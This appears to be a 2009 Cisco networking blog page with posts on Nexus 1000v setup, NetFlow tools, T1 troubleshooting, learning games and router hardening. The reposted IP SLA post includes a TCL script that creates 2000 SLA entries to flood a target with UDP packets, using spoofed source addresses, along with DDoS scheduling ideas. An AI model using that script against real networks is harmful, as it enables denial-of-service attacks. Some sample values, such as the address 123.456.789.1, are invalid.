Pete’s Packet

I don’t think I can. I know I can!

Cisco NetPro is getting a much needed facelift.

Posted by Peter Kurdziel on November 9, 2009

I was invited to Cisco’s office in New York City to share my thoughs and opinions of the new NetPro site.   There will be a forum, blog, wiki and maybe a Netpro certification.

I liked the new site and I am looking forward to the launch.
 

Posted in Routing & Switching Lab | Leave a Comment »

Narbik’s CCIE Routing & Switching Trouble Shooting Workbook – SAMPLE LAB

Posted by Peter Kurdziel on November 6, 2009

http://www.micronicstraining.com/classes/index.php?dispatch=products.view&product_id=29829

The CCIE Routing and Switching troubleshooting mock labs work book
contains 10 lab scenarios designed to prepare the CCIE candidates for
the new Troubleshooting section of the CCIE R&S lab exam. Every lab
contains 15 trouble tickets, plus a brain teaser question. The solution
contains detailed explanation with “Show” and “Debug” command and most
of the trouble tickets are tested. This work book is written by Narbik
Kocharians (Triple CCIE) and Dan Schetcher (Triple CCIE).

This work book is in FULL color and it comes in Secure PDF with No Printing option.

See Download Free Sample Chapter at the bottom of the page.

http://www.micronicstraining.com/classes/index.php?dispatch=products.view&product_id=29829

Posted in Routing & Switching Lab | Leave a Comment »

Nexus 1000v initial setup

Posted by Peter Kurdziel on October 27, 2009

For installation see: 1000V demo video’s
Part 1 – VSM Install
http://vimeo.com/5719299
Part 2 – Connecting the VSM to vCenter
http://vimeo.com/5721462
Part 3 – Configuring Uplink Port Profiles
http://vimeo.com/5746855
Part – - Installing the VEM
http://vimeo.com/5792424

Connecting the Nexus 100v to Vmware virtual center:

N1KV-1# config t

N1KV-1(config)# svs conn vc
N1KV-1(config-svs-conn)# remote ip add 192.168.189.128 <— IP address of VCenter

N1KV-1(config-svs-conn)# protocol vmware-vim <— this is the only protocol available

N1KV-1(config-svs-conn)# vmware dvs datacenter-name DC <— the datacenter name
N1KV-1(config-svs-conn)# connect <——————-connect to Vcenter
Note: Command execution in progress..please wait

Configuring uplink port profiles:

N1KV-1# config t
N1KV-1(config)# port-Profile system-uplink
N1KV-1(config-port-prof)# sw mo tr
N1KV-1(config-port-prof)# sw tr all vlan add 51,52
N1KV-1(config-port-prof)# no shut
N1KV-1(config-port-prof)# channel-group auto sub-group cdp <– if you use multiple physical NICs.
 

N1KV-1(config-port-prof)# system vlan 51,52 <—add the control and packet vlans created in vsphere.

N1KV-1(config-port-prof)#
N1KV-1(config-port-prof)#
N1KV-1(config-port-prof)# capability uplink
N1KV-1(config-port-prof)#
N1KV-1(config-port-prof)#
N1KV-1(config-port-prof)#
N1KV-1(config-port-prof)# vmware port-group
N1KV-1(config-port-prof)#
N1KV-1(config-port-prof)# state enabled <— enable

N1KV-1(config)# vlan 53   <—- define a new vlan for VMs to use.
N1KV-1(config-vlan)# name VM-Data
N1KV-1(config-vlan)# exit
 
N1KV-1(config)# port-profile data-uplink < — for data traffic
N1KV-1(config-port-prof)# sw mo tr
N1KV-1(config-port-prof)# sw tr all vla add 53
N1KV-1(config-port-prof)# no shut

N1KV-1(config-port-prof)# channel-group auto sub-group cdp <– if you use multiple physical NICs.
N1KV-1(config-port-prof)#
N1KV-1(config-port-prof)#
N1KV-1(config-port-prof)# vmware port-group
N1KV-1(config-port-prof)# state enabled  <— pushes the port profile to the vcentr server
Note: Processing command..

N1KV-1(config)# port-profile Test-VM < —- for VM traffic
 
N1KV-1(config-port-prof)# sw mo acc
N1KV-1(config-port-prof)# sw acc vlan 53 <— defined earlier VM-Data traffic
N1KV-1(config-port-prof)# no shut
N1KV-1(config-port-prof)# vmware port-group
N1KV-1(config-port-prof)# tate enabled  <— pushes the port profile to the vcentr server
Note: Processing command..
N1KV-1(config-port-prof)# end

You will need to install the VEM – Virtual Ethernet Modules and install the vem code in vsphere.

Posted in Uncategorized | Leave a Comment »

Netflow tools

Posted by Peter Kurdziel on October 27, 2009

Stager is a system for aggregating and presenting network statistics.
Stager is generic and can be customized to present and process any kind
of network statistics. The backend collects data and stores reports in
a database, automatically handling the aggregation of hourly statistics
into days, weeks, and months. The Web frontend presents data in tables,
matrices, or plots. The reports are fully customizable, and their
definitions are stored in an XML file.

http://software.uninett.no/stager/

The nfdump tools collect and process netflow data on the command line
http://nfdump.sourceforge.net/

NfSen is a graphical web based front end for the nfdump
netflow tools.
http://nfsen.sourceforge.net/

Posted in Other, Real World, Security | Leave a Comment »

Layer 1 Voice T1 Troubleshooting

Posted by Peter Kurdziel on October 27, 2009

Layer 1 Voice T1 Troubleshooting

Common problems

Misconfiguration at one end
Switch type must match
Channels must match
Clock must be opposite
Isdn protocol-emulate must be opposite
Dial  peers coordinated

Layer 1  – needs to match

·        Framing – ESF or SF (aka D4)
·        Line coding – B8ZS (use with ESF) or AMI (use with SF)
·        Cable length – Can induce attenuation if needed for short cables
·        Clocking – MUST be set correctly – one side provides to the other
·        Channels in use – Depends on protocol and call-control agent

Troubleshooting Commands for ISDN PRI

Show controller t1 x/y·
Show voice port summary·
Show isdn status (shows Layer 1 and Layer 2status)·
Show dialplan number {digits}·
Debug isdn q921·
Debug isdn q931 (most useful to see signaling)·
Debug voice ccapi inout

T1 CAS (Channel Associated Signaling)

Layer 1  – needs to match

·        Framing – ESF or SF (aka D4)
·        Line coding – B8ZS (use with ESF) or AMI (use with SF)
·        Cable length – Can induce attenuation if needed for short cables
·        Clocking – MUST be set correctly – one side provides to the other
·        Channels in use – Depends on protocol and call-control agent

Troubleshooting Commands for T1-CAS
Show controller t1 x/y
Show voice port summary
Show dialplan number {digits}
Debug vpm sig (to see cas signaling)
Debug voice dspapi (to see the digits at low level)
Debug voice ccapi inout

Ref: Cisco techtorial

Posted in Troubleshooting | Leave a Comment »

Cisco SLA Packet Samples – generate traffic

Posted by Peter Kurdziel on October 26, 2009

cisco ip sla attack

IP SLA
with the IP SLA function in the IOS, there is a other way to create packets to a specific port and target. Normaly used for
testing the availability of services and/or devices, but i think, there is a chance for abuse.
See some of my ideas.
- what, if we create 1000 SLA’s on the same router
- create a TCL script for creating the 1000 SLA’s
- create scheduled SLA’s for a DDoS on a defined time
- create random DNS or HTTP Querys

Cisco SLA Packet Samples

SLA Sample TCP Port
tcp connections to 192.168.1.1 port 99 every 1 second

	ip sla 1
	 tcp-connect 192.168.1.1 99 control disable
	 threshold 1
	 timeout 1
	 frequency 1
	ip sla schedule 1 life 300 start-time now

SLA Sample UDP Port
udp connections to 192.168.1.1 port 100 from sourceip 1.2.3.4 and sourceport 12345 every 1 second

	ip sla 2<br />	 udp-echo 192.168.1.1 100 source-ip 1.2.3.4 source-port 12345 control disable<br />	 threshold 1	<br />	 timeout 1<br />	 frequency 1<br />	ip sla schedule 2 life 300 start-time now<br />

SLA Sample ICMP
tcp connections to 192.168.1.1 port 100 every 1 second

	ip sla 3<br />	 icmp-echo 192.168.1.1<br />	 threshold 1<br />	 timeout 1<br />	 frequency 1<br />	ip sla schedule 3 life 300 start-time now<br />

SLA Sample FTP
FTP to check, if a file is on a FTP server

	ip sla 11<br />	 ftp get ftp://user:password@host/file_name<br />	!<br />	ip sla schedule 11 start-time now<br /><br />

SLA Sample HTTP
HTTP connections to 192.168.1.1 port 100 every 1 second with file index.html
(Limit: Minimum frequency for HTTP should be 60sec )

	ip sla 4<br />	 http get http://192.168.2.100/index.html<br />	 threshold 1<br />	 timeout 1<br />	 frequency 60<br />	ip sla schedule 4 life 300 start-time now<br />

SLA Sample HTTP (RAW)
HTTP connections to 192.168.1.1 every 1 second with RAW Code
(Limit: Minimum frequency for HTTP should be 60sec )

	ip sla 5<br />	 http raw http://192.168.1.1<br />	 http-raw-request<br />	  GET /ch/index.html HTTP/1.0\r\n\r\n<br />	  exit<br />	 threshold 1<br />	 timeout 1<br />	 frequency 60<br />	ip sla schedule 5 life 300 start-time now<br />

SLA Sample DNS
DNS request www.laber.com every 9 second to dns server 192.168.1.1
Minimum frequency for DNS operation should be 9

	ip sla 6<br />	 dns www.laber.com name-server 192.168.1.1<br /> 	 timeout 1<br /> 	 threshold 1<br />  	 frequency 9<br />	ip sla schedule 10 life 300 start-time now<br />

Schedule the SLA

	<br />	ip sla schedule 1 start-time 10:00:00 life 300 recurring           <- every day at 10:00 for 300 seconds<br />	ip sla schedule 2 start-time now life forever                      <- start now and run forever<br />	ip sla schedule 3 start-time 10:00:00 1 Jan life 1000              <- start on 1.Jan for 1000 seconds<br />

play around with the options, Source-ip and source-port Lifetime, thershold etc..
and for testing with source-ip and source-port, the source-ip must NOT exist on a Loopback Interface.
For flooding it’s requierd, that you have to enter “control disable”. For HTTP or DNS Request, you can not
enable or diesale “control”, beacause, there is no “CISCO” Responder.

TCL script with SLA packet packets

Script Sample UDP
This TCL Script creats 2000 “ip sla” etntires in the config file, each
on creat every secoand a udp packet to the targen host 192.168.1.1 and
destination port 100 for 5 Minutes. (300 Seconds)
Warning: Use a lot of CPU Power, and depending on your hardware, 2000 is to mutch.

 <br />	puts "Creating UDP"<br />	set count 2000<br />	for {set X 1} {$X<$count} {incr X} {<br />	puts $X<br />	ios_config "ip sla $X" "udp-echo 192.168.1.1 100 control disable" "threshold 1" "timeout 1" "frequency 1"<br />	ios_config "ip sla schedule $X life 300 start-time now"<br />	}<br />

and for removing all entries

	puts "Deleting"<br />	set count 2000<br />	for {set X 1} {$X<$count} {incr X} {<br />	puts $X<br />	ios_config "no ip sla $X "<br />    	}<br />

New Sample with Sourceport and Source-IP

 <br />	puts "Creating UDP"<br />	set count 2000<br />	for {set X 1} {$X<$count} {incr X} {<br />	puts $X<br />	ios_config "ip sla $X" "udp-echo 192.168.1.1 100 source-ip 1.2.3.4 source-port 12345 control disable" "threshold 1" "timeout 1" "frequency 1"<br />	ios_config "ip sla schedule $X life 300 start-time now"<br />	}<br />

send binary data

with the http raw options it’s possible, to send TEXT and Binary Code.
to a selectable port (Source IPD and Port is changable to)
You can send 0×01 with the string \x01 in the http-raw-request.

 
Sample :
<font color="#000000" face="Verdana, Arial, Helvetica, sans-serif"> ip sla 1<br />  http raw http://laber.peanuts.ch:445<br />  http-raw-request<br />  \x01\x02\x03\x48\x41\x4C\x4C\x4F\xff    <br />  exit<br /> !<br /> ip sla schedule 1 start-time now<br /></font>

 

Known Problem
Currently, i found NO way, to send a “NULL” (0×00), arghh…

 
Known Limits
– max 1280 chars in the config file.
– max 252 chars per line
– \x23 for sendening #
– \x?? reduce tha max packet length.
 

strange things…

Some stranges things, maybe feautures or bugs?
1. it’s possible to set the TOS to 255, but in the DCSP Fields in the packets, i see only that the 6 DSCP bits ar set.

	evil-router(config-ip-sla-tcp)#tos ?<br />	  <0-255>  Type of Service Value<br />

2. Some problem with the order in the configfile and the dependency of timeout and threshold
If you configure timeout 1 and threshold 1, you must configure threshold before timeout, but, after
you see in the configuratin file following: timeout is before treshold.

	ip sla 4<br />	 tcp-connect 192.168.2.100 98 control disable<br />	 tos 1<br />	 timeout 1<br />	 threshold 1<br />	 frequency 1<br />	ip sla schedule 4 life 60 start-time now<br />

and after a restart you see following boot message:

	<br />	1 DSL controller<br />	9 FastEthernet interfaces<br />	1 ISDN Basic Rate interface<br />	62720K bytes of ATA CompactFlash (Read/Write)<br />	Installed image archive<br />	%Error: timeout value is less than threshold 5000<br />	%Illegal Value: Cannot set Frequency to be less than Timeout<br />	%Error: timeout value is less than threshold 5000<br />	%Illegal Value: Cannot set Frequency to be less than Timeout<br />	<br />	<br />		<br />	Press RETURN to get started!<br />	<br />

I see this on my cisco 1800 router

	evil-router#sh version<br />	Cisco IOS Software, C180X Software (C180X-ADVIPSERVICESK9-M), Version 12.4(22)T, RELEASE SOFTWARE (fc1)<br />	Technical Support: http://www.cisco.com/techsupport<br />

Update:(05.01.2009)
Tests with other routers and diffenet IOS versions shows me, that that must be a BUG on this version on my Cisco 1800 Router.

 
Cisco Dokumentation
 
threshold milliseconds
(Optional) Sets the upper threshold value for calculating network monitoring statistics created by an IP SLAs operation.
Example:
Router(config-sla-monitor-echo)# threshold 10000
 
timeout milliseconds
(Optional) Sets the amount of time an IP SLAs operation waits for a response from its request packet.
Example:
Router(config-sla-monitor-echo)# timeout 10000
 

Source:
http://www.packetlevel.ch/html/cisco/ciscoslahack.html

Posted in Troubleshooting | Leave a Comment »

Online web-based ping: remote ping a server or web site using our network with 38 checkpoints worldwide

Posted by Peter Kurdziel on October 24, 2009

http://just-ping.com

Posted in Troubleshooting | Leave a Comment »

Tutorial: BGP/MPLS Layer 3 VPNs

Posted by Peter Kurdziel on October 24, 2009

Posted in BGP, MPLS, VPN | Leave a Comment »

Cisco Games – Become a CEO. Change the World. Play Cisco myPlanNet.

Posted by Peter Kurdziel on October 23, 2009

Become a CEO. Change the World. Play Cisco myPlanNet.

Come check out Cisco myPlanNet 1.0. Cisco myPlanNet 1.0 is a simulation game that puts you into the shoes of a service provider CEO. You manage your business as it evolves from the stone age of dial-up, through the broadband and mobile connected eras, and into the dawning of the medianet age. Play it now on the Cisco Learning Network games arcade.

[Play Now!]


The Cisco Mind Share Game: The Cisco Mind Share Game is the most comprehensive learning game from Cisco yet! This fun and challenging game covers more than half the content of the CCENT/ CCNA exam was designed to reinforce a variety of standard networking skills and help you practice these new skills in preparation for CCENT and CCNA Cisco certification exams.

 

Play the FREE Demo Version Now or Download the FULL Version Now!

Cisco myPlanNet 1.0 is a simulation game in which you play a service-provider CEO who must manage the company as it evolves from the “stone age” of dial-up, through the broadband- and mobile-connected eras, into the dawning of the “medianet age.” Connect your citizens with the next-generation IP network and guide them into the Connected Life with the wonders of visual networking. Reach for the top and engage in discussions with your fellow players.

 

Play now!

Subnet Troubleshooting Game: If you enjoyed Cisco’s popular Subnet game, try the next step – the Subnet Troubleshooting game! Diagnose and fix the subnet scheme for an operational network while minimizing impact to users. Hone your subnetting skills as you work your way up from branch office to corporate headquarters.

 

Play Now!

 

Multiplayer Challenge(in SPANISH, too!): Play online with other players or against the computer and see if all your studying has paid off! Prepare for your certification and have a blast while you do! Contains questions from CCENT, CCNA, CCNP; CCDP and CCVP certifications in the following courses: ARCH, BGP, BSCI, CVOICE, ICND-1, ICND-2, MPLS and QOS.

 

Play in English Now – or- Juegue en Español Ahora !

Oprima “CCNA (es)” para jugar en español.

The Binary Game: Come play the game enjoyed by hundreds of thousands of people all over the world. This game is posted on dozens of game sites and played in more than 125 countries. The game is not only fun, but it is considered by many to be the best way to learn how to use the binary number system.

 

Play Now!

Cisco Edge Quest: Online game introducing the new Cisco ASR 1000 Series Routers. Players maneuver a router craft through various levels and increasingly use the power of the Cisco ASR 1000 Series Router to defend the network edge!

 

Play Now!

Network Defenders: Puts you in control of your company’s network security. It’s a hostile world out there and malicious hackers are trying to get into your network and wreak havoc on your data. Learn about the risks and how to guard against them.

 

Play Now!

SAN Rover: The research station on Mars needs a robust network to sore and manage the exploration data being gnerated. You have been assigned to build a Storage Area Network (SAN) for the station. Command the Rover to tread the hostile terrain of the Red Planet.

 

Play Now!

Secure Volunteer: You have chosen to volunteer for NetHope, a nonporfit consortium of leading international organizations that provide connectivity in the developing world. You find out when you arrive that the director has been looking for you.

 

Play Now!

The Cisco Subnet Game: Master the often-challenging world of subnetting! Helpful if you are preparing for a Cisco CCENT or CCNA Certification or just trying to understand subnetting better for your job.

 

Play Now!

Subnet Slingshot: You will be working with one of the maintenance droids on to replace the gravity core on one of Outpast Athens’ decks that is in rough shape. You have to work fast or the ship’s deck will lose gravity.

 

Play Now!

Unified Communications Simulation Challenge: As CIO of My, Inc., it is up to you to choose the migration path to produce the highest productivity and efficiency by migrating to IP voice, video, and collaboration using Cisco Unified Communications applications.

 

Play Now!

Wireless Explorer: Your spacecraft, equipped with the latest wireless technologies, is docking on planet Berellius Prime. You must welcome aboard an envoy of alien scientists sent to study the latest technologies on Earth and configure open wireless access to the ship’s mainframe correctly for each alien.

 

Play Now!

IPC Rockin’ Retailer: You manage the employees of IP Beats, a music store and live performance venue. Despite the success of IP Beats, the communmications and inventory systems are highly outdated. Learn how to configure the Cisco IP Communications Solution to address IP Beats’ needs and be a company hero with your boss.

 

Play Now!

Peter Packet: This superhero helps messages move across the Internet. Follow him on his exciting adventures along the Internet highway. Play the game and learn how the Internet works to help Peter bring important life-saving messages to different locations worldwide. With your help, he can overcome hackers and viruses to help kids in different places around the globe.

 

Play Now!

The Realm: Though this is not actually a game, but more of a colorful comic-book-like experience, we thought we’d provide a link here for your entertainment. “Welcome to the Digital Era on Earth, where a new class of criminal has emerged. To stop these menaces, a select group of Cisco engineers has been appointed to develop a state-of-the-art security force that must battle Botnets, Malware, Spam and Intruders, assuring the safety and security of every citizen in the human network.”

 

Enjoy this fun experience now!


Posted in Routing & Switching Lab | Leave a Comment »

Cisco Config Best Practices

Posted by Peter Kurdziel on October 22, 2009

Router configuration Best Practices

DOCUMENT- DOCUMENT- DOCUMENT

I can not stress that enough. Always get a copy of the current running config and keep it in a safe place. I had one router where a vendor configured it, I just happen to get a copy for my records. 5 months later they took a power hit and guess what, the vendor had never saved the config to NVRAM. Without my notes, this would have been very bad.

To protect against a “smurf” attack use the following comand:
!
no ip directed-broadcast
!

Other easy security measures are:
!
no service tcp-small-server
no service udp-small-server
!

You should have names that make sense. Just an IP or nothing at all makes troubleshooting much more difficult then it needs to be.

To configure the host name:

router(config) hostname california_wan ; note the lower case. Not all software can handle uppercase correctly so lower case is “safer”

Remember that SNMP can get this name from the sysName variable so again, use a name that makes sense.

Interfaces:

Always.. always use a description for each interface. A very good idea with WAN links is to use the circuit number as part of the description. When you are on the phone trying to troubleshoot a down link, this small detail can be a lifesaver for you.
Including the contact and phone number adds to your work load as this information tends to be rather transitory nowdays

!
interface serial 0.1 point to point
description San Fransico to New York PVC, circuit 001BHAC56789-001
ip address 123.456.789.1
!

You can see how easy this is to read and when you are trying to troubleshoot problems, this is what you want, nice clear descriptions

Get into the habit of specifing the bandwidth even if it’s not needed. Some protocols like OSPF use the bandwidth to help figure out the metrics using this information.

If your link is slower the 256K, you *may* want to use the following command to make more buffer available depending on the link load
!
no ip route-cache
!

Always configure a loopback address. This provides several positive things.
OSPF will by default use the loopback as the router ID or use the highest IP number as the router ID. If you plan this right, you can make your OSPF IDs make sense
10.10.10.1
10.10.10.2
10.10.10.3 etc

Also with OSPF, each time a link “flaps” all the routers must recalculate the route changes. Since the loopback doesnt “flap”, the network will be more stable
You can telnet to it without regard to whether the interface is “up” or not. SNMP polling is the same thing.
A stable interface is very important to protocols like SNA which is very sensitive to time delays and outage. This also applies to DLSW, STUN and RSBR
IP or PPP from a laptop if you find yourself in a bind.

SNMP

SNMP is one of those double edged swords. It can be very useful but dangerous to your peace of mind if not handled well. SNMP has two types of communities. Read Only and Read/Write. The read/write is the dangerous one. With this string, you are god on the router and there is not any password checking ( normally)
Read/write SNMP is a way to get out of the nasty box of configuring the enable password and then promptly forgetting it or mistyping it. Not that this EVER happens ( dont ask how I know this one)

It very easy to configure

router(config)snmp-server community string RO; read only snmp string
router(config)snmp-server community string RW; read/write snmp string

Do NOT use common names, your name, words like sex and the like. There are dictionary based SNMP crackers out there so be careful with your choices. Better yet, get a cracker and look at the dictionary to get an idea of what is in them.

I alway use the snmp-server chassis-id serial-number to ID the router so I can get the SN remotely.

You can specify access lists to restrict the number of workstations with access to the SNMP info.

!
access-list 60 permit 123.456.789.1 0.0.0.0 ; limits access to a single IP
!

If you want to be very paranoid then consider the following comand

!
snmp-server trap-authenication
!

This sends traps to your management station whenever a invalid community string is tried. Fun huh?

A very good friend is called SYSLOG. This is a great way to get a nice log file about things that happen to interfaces, events and debugging. I happen to use a Wintel syslog deamon from Kiwi software. There are many to choose from from both Wintel and Unix/linux
To work with syslog, use the following commands.

!
logging on
logging buffered
!
loggin 123.456.789.1 ; the IP address is the syslog management workstation
!

CDP

Very useful to both you and hackers. So the rule is if you plan to use it( good idea), make sure you turn it OFF on any outside interfaces.

!
interface ethernet 0
ip address 123.456.789.2 255.255.255.0
!
no cdp enabled
!

Telnet access is something many people ignore. It’s prefectly acceptable to lock down your telnet ports to some degree. Just dont make it too restrictive ( like having to hit a certain router then bounce back)
use a strong password, again, not common names etc. Dont leave printouts of the running-config laying around. There are several password crackers that can be used to compromise your passwords if you give someone a chance

!
access-list 1 permit 1.2.3.0 0.0.0.255
!
line vty 0 4
access-class 1 in
login
password xxxxx
exec-timeout 5 0
!
source:http://www.tek-tips.com/faqs.cfm?fid=404

Posted in Best practices, Real World | Leave a Comment »